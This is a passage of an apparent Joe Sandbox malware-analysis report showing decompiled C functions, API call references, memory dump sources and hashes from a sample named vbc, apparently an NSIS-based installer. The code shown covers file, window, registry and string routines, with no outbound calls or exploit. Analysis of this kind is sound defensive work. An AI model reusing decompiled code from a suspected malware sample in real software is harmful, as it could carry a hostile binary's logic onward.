                                                0x00403075
                                                0x0040307c
                                                0x00403042
                                                0x00403049
                                                0x00403049
                                                0x00403022
                                                0x00403022
                                                0x00403029
                                                0x0040302c
                                                0x0040302c
                                                0x00403032
                                                0x00403039
                                                0x00403039

                                                APIs
                                                • DestroyWindow.USER32 ref: 0040302C
                                                • GetTickCount.KERNEL32(00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040304A
                                                • CreateDialogParamW.USER32 ref: 00403067
                                                • ShowWindow.USER32(00000000,00000005), ref: 00403075
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 53%
                                                			E00405F14(void* __eflags, intOrPtr _a4) {
                                                				int _t11;
                                                				signed char* _t12;
                                                				intOrPtr _t18;
                                                				intOrPtr* _t21;
                                                				signed int _t23;
                                                
                                                				E0040653D(0x42fa70, _a4);
                                                				_t21 = E00405EB7(0x42fa70);
                                                				if(_t21 != 0) {
                                                					E004067C4(_t21);
                                                					if(( *0x434f18 & 0x00000080) == 0) {
                                                						L5:
                                                						_t23 = _t21 - 0x42fa70 >> 1;
                                                						while(1) {
                                                							_t11 = lstrlenW(0x42fa70);
                                                							_push(0x42fa70);
                                                							if(_t11 <= _t23) {
                                                								break;
                                                							}
                                                							_t12 = E00406873();
                                                							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                								E00405E58(0x42fa70);
                                                								continue;
                                                							} else {
                                                								goto L1;
                                                							}
                                                						}
                                                						E00405E0C();
                                                						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                					}
                                                					_t18 =  *_t21;
                                                					if(_t18 == 0 || _t18 == 0x5c) {
                                                						goto L1;
                                                					} else {
                                                						goto L5;
                                                					}
                                                				}
                                                				L1:
                                                				return 0;
                                                			}








                                                0x00405f20
                                                0x00405f2b
                                                0x00405f2f
                                                0x00405f36
                                                0x00405f42
                                                0x00405f52
                                                0x00405f54
                                                0x00405f6c
                                                0x00405f6d
                                                0x00405f74
                                                0x00405f75
                                                0x00000000
                                                0x00000000
                                                0x00405f58
                                                0x00405f5f
                                                0x00405f67
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405f5f
                                                0x00405f77
                                                0x00000000
                                                0x00405f8b
                                                0x00405f44
                                                0x00405f4a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405f4a
                                                0x00405f31
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?), ref: 00405EC5
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,74EDD4C4,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74EDD4C4,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 3248276644-4017390910
                                                • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 89%
                                                			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                				int _t15;
                                                				long _t16;
                                                
                                                				_t15 = _a8;
                                                				if(_t15 != 0x102) {
                                                					if(_t15 != 0x200) {
                                                						_t16 = _a16;
                                                						L7:
                                                						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
                                                							_push(_t16);
                                                							_push(6);
                                                							 *0x42d254 = _t16;
                                                							E00404ED4();
                                                						}
                                                						L11:
                                                						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
                                                					}
                                                					if(IsWindowVisible(_a4) == 0) {
                                                						L10:
                                                						_t16 = _a16;
                                                						goto L11;
                                                					}
                                                					_t16 = E00404E54(_a4, 1);
                                                					_t15 = 0x419;
                                                					goto L7;
                                                				}
                                                				if(_a12 != 0x20) {
                                                					goto L10;
                                                				}
                                                				E004044E5(0x413);
                                                				return 0;
                                                			}





                                                0x00405517
                                                0x00405521
                                                0x0040553d
                                                0x0040555f
                                                0x00405562
                                                0x00405568
                                                0x00405572
                                                0x00405573
                                                0x00405575
                                                0x0040557b
                                                0x0040557b
                                                0x00405585
                                                0x00000000
                                                0x00405593
                                                0x0040554a
                                                0x00405582
                                                0x00405582
                                                0x00000000
                                                0x00405582
                                                0x00405556
                                                0x00405558
                                                0x00000000
                                                0x00405558
                                                0x00405527
                                                0x00000000
                                                0x00000000
                                                0x0040552e
                                                0x00000000

                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00405542
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                  • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                				int _v8;
                                                				long _t21;
                                                				long _t24;
                                                				char* _t30;
                                                
                                                				asm("sbb eax, eax");
                                                				_v8 = 0x800;
                                                				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                				_t30 = _a16;
                                                				if(_t21 != 0) {
                                                					L4:
                                                					 *_t30 =  *_t30 & 0x00000000;
                                                				} else {
                                                					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                					_t21 = RegCloseKey(_a20);
                                                					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                						goto L4;
                                                					}
                                                				}
                                                				return _t21;
                                                			}







                                                0x00406419
                                                0x0040641b
                                                0x00406433
                                                0x00406438
                                                0x0040643d
                                                0x0040647b
                                                0x0040647b
                                                0x0040643f
                                                0x00406451
                                                0x0040645c
                                                0x00406462
                                                0x0040646d
                                                0x00000000
                                                0x00000000
                                                0x0040646d
                                                0x00406481

                                                APIs
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800), ref: 00406451
                                                • RegCloseKey.ADVAPI32(?), ref: 0040645C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID: Call
                                                • API String ID: 3356406503-1824292864
                                                • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403B57() {
                                                				void* _t2;
                                                				void* _t3;
                                                				void* _t6;
                                                				void* _t8;
                                                
                                                				_t8 =  *0x42b22c;
                                                				_t3 = E00403B3C(_t2, 0);
                                                				if(_t8 != 0) {
                                                					do {
                                                						_t6 = _t8;
                                                						_t8 =  *_t8;
                                                						FreeLibrary( *(_t6 + 8));
                                                						_t3 = GlobalFree(_t6);
                                                					} while (_t8 != 0);
                                                				}
                                                				 *0x42b22c =  *0x42b22c & 0x00000000;
                                                				return _t3;
                                                			}







                                                0x00403b58
                                                0x00403b60
                                                0x00403b67
                                                0x00403b6a
                                                0x00403b6a
                                                0x00403b6c
                                                0x00403b71
                                                0x00403b78
                                                0x00403b7e
                                                0x00403b82
                                                0x00403b83
                                                0x00403b8b

                                                APIs
                                                • FreeLibrary.KERNEL32(?,74EDD4C4,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                • GlobalFree.KERNEL32(?), ref: 00403B78
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 1100898210-4017390910
                                                • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                				int _v8;
                                                				int _t12;
                                                				int _t14;
                                                				int _t15;
                                                				CHAR* _t17;
                                                				CHAR* _t27;
                                                
                                                				_t12 = lstrlenA(_a8);
                                                				_t27 = _a4;
                                                				_v8 = _t12;
                                                				while(lstrlenA(_t27) >= _v8) {
                                                					_t14 = _v8;
                                                					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                					_t15 = lstrcmpiA(_t27, _a8);
                                                					_t27[_v8] =  *(_t14 + _t27);
                                                					if(_t15 == 0) {
                                                						_t17 = _t27;
                                                					} else {
                                                						_t27 = CharNextA(_t27);
                                                						continue;
                                                					}
                                                					L5:
                                                					return _t17;
                                                				}
                                                				_t17 = 0;
                                                				goto L5;
                                                			}









                                                0x00405fa2
                                                0x00405fa4
                                                0x00405fa7
                                                0x00405fd3
                                                0x00405fac
                                                0x00405fb5
                                                0x00405fba
                                                0x00405fc5
                                                0x00405fc8
                                                0x00405fe4
                                                0x00405fca
                                                0x00405fd1
                                                0x00000000
                                                0x00405fd1
                                                0x00405fdd
                                                0x00405fe1
                                                0x00405fe1
                                                0x00405fdb
                                                0x00000000

                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBA
                                                • CharNextA.USER32(00000000), ref: 00405FCB
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%